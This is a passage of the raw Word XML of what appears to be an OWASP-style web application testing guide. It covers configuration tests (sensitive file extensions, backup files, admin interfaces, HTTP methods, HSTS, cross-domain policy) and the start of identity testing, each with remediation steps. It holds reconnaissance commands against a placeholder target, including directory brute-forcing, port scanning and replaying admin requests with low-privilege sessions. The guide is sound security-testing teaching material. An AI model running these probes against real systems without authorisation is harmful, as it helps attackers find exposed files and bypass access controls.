              </w:rPr>
              <w:t xml:space="preserve">curl https://target.com/server-status</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl https://target.com/nonexistent-page-xyz</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Remove default/sample files and directories shipped with the platform (phpinfo.php, /examples/, /manual/).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure custom, generic error pages for all 4xx/5xx responses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run application/service processes under a dedicated, least-privilege account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable and centrally collect application/security logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CONFIG-003  —  Test File Extensions Handling for Sensitive Information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Browser, Nikto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify accessible files with extensions that commonly expose sensitive information (source, config, or backup data).</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Enumerate common sensitive extensions against discovered filenames using a directory/file brute-forcer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Manually attempt to access source/config equivalents of discovered pages (e.g., login.php.bak, login.asa, config.inc).</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nikto -h https://target.com -Tuning 3</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ffuf -u https://target.com/FUZZ -w extensions.txt -mc 200 -e .bak,.old,.zip,.tar,.sql,.txt,.inc</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Configure the web server to explicitly deny access to non-web file extensions (.bak, .old, .inc, .sql, .zip, .tar).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Never store backup or config files inside the web root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CONFIG-004  —  Backup and Unreferenced Files for Sensitive Information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Nessus, Nikto, Wikto, ffuf, gobuster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Discover backup, temporary, or unreferenced files (via naming pattern guessing, JS source review, or cache) that may hold sensitive information.</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Brute-force common backup naming conventions against known filenames (file.php.bak, file~, file.php.old, file.php.swp).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Review Google/Wayback Machine cache for previously indexed but now-removed pages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check JavaScript source for references to files or endpoints not linked in the visible UI.</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gobuster dir -u https://target.com -w common.txt -x bak,old,zip,swp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl 'http://web.archive.org/cdx/search/cdx?url=target.com/*&amp;output=text'</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Remove all backup/temp files from production web roots as a deployment checklist item.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Automate cleanup as part of the CI/CD pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CONFIG-005  —  Enumerate Infrastructure and Application Admin Interfaces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Dirb, DirBuster, FuzzDB, Tilde Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Discover exposed administrative interfaces through directory/file enumeration, source code comments, and alternative ports.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Run a directory brute-force against common admin paths (/admin, /administrator, /backend, /manage, /cpanel).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan for alternative management ports commonly associated with app servers (8080, 8443, 9090, 10000).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Review IIS short-filename (tilde) disclosure if targeting an IIS server.</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dirb https://target.com /usr/share/wordlists/dirb/common.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap -p 8080,8443,9090,10000 target-ip</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">java -jar IIS_shortname_scanner.jar 2 20 https://target.com/</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Restrict admin interfaces to an internal network or VPN, never expose directly to the internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Rename default admin paths and add an additional authentication layer (e.g., client cert, MFA).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable IIS short-name discovery if applicable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CONFIG-006  —  Test HTTP Methods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Netcat, curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify which HTTP methods are permitted on the server and test for arbitrary method acceptance, HEAD-based access-control bypass, and Cross-Site Tracing (XST).</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Send an OPTIONS request and review the Allow header for enabled methods.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt access-restricted resources using HEAD instead of GET to test for bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Send a TRACE request and check if it is echoed back (indicates XST risk when combined with cookie access).</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curl -i -X OPTIONS https://target.com/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -i -X HEAD https://target.com/admin/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -i -X TRACE https://target.com/</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Disable unused HTTP methods (TRACE, PUT, DELETE, CONNECT) at the web server level.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure access control logic applies identically regardless of HTTP method used.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CONFIG-007  —  Test HTTP Strict Transport Security</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 curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm the HSTS header is present and correctly configured to force browsers to use HTTPS for all future requests to the domain.</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Send a request to the HTTPS endpoint and inspect the response for a Strict-Transport-Security header.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify the max-age value is sufficiently long (recommended &gt;= 31536000, i.e. one year).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check whether includeSubDomains and preload directives are set as appropriate.</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curl -s -D- https://target.com/ | grep -i strict</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Add Strict-Transport-Security: max-age=31536000; includeSubDomains; preload to all HTTPS responses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Submit the domain to the HSTS preload list where appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CONFIG-008  —  Test RIA Cross Domain Policy</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 Nikto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyze crossdomain.xml (Flash) and clientaccesspolicy.xml (Silverlight) for overly permissive cross-domain access settings.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Request /crossdomain.xml and /clientaccesspolicy.xml directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Review the allow-access-from domain and permitted-cross-domain-policies attributes for wildcards or overly broad trust.</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curl https://target.com/crossdomain.xml</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl https://target.com/clientaccesspolicy.xml</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Avoid wildcard (*) domain trust in cross-domain policy files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove these files entirely if Flash/Silverlight content is not in use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId13"/>
          <w:footerReference w:type="default" r:id="rId14"/>
          <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
          <w:pgMar w:top="1350" w:right="1350" w:bottom="1350" w:left="1350" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CATEGORY 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Identity Management Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Identity management testing examines how the application defines roles, provisions and de-provisions accounts, and enforces identity-related business rules — areas that, if flawed, allow privilege abuse or unauthorized account creation.</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3200"/>
        <w:gridCol w:w="6600"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Category Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">IDENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Number of Test Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Test ID Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OTG-IDENT-001 – OTG-IDENT-007</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-IDENT-001  —  Test Role Definitions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Validate that system roles are clearly defined and that a permission matrix accurately reflects what each role can and cannot do.</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Enumerate every distinct role/privilege level in the application (via documentation, UI, or trial accounts).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Build a permission matrix mapping each role against every sensitive function.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test each role against functions it should NOT have access to, using intercepted requests replayed with a lower-privileged session.</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(Burp) capture an admin-privileged request, resend it using a low-privilege session's cookie/token</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Implement and enforce role-based access control (RBAC) server-side for every sensitive function.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep the permission matrix documented and reviewed as roles evolve.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
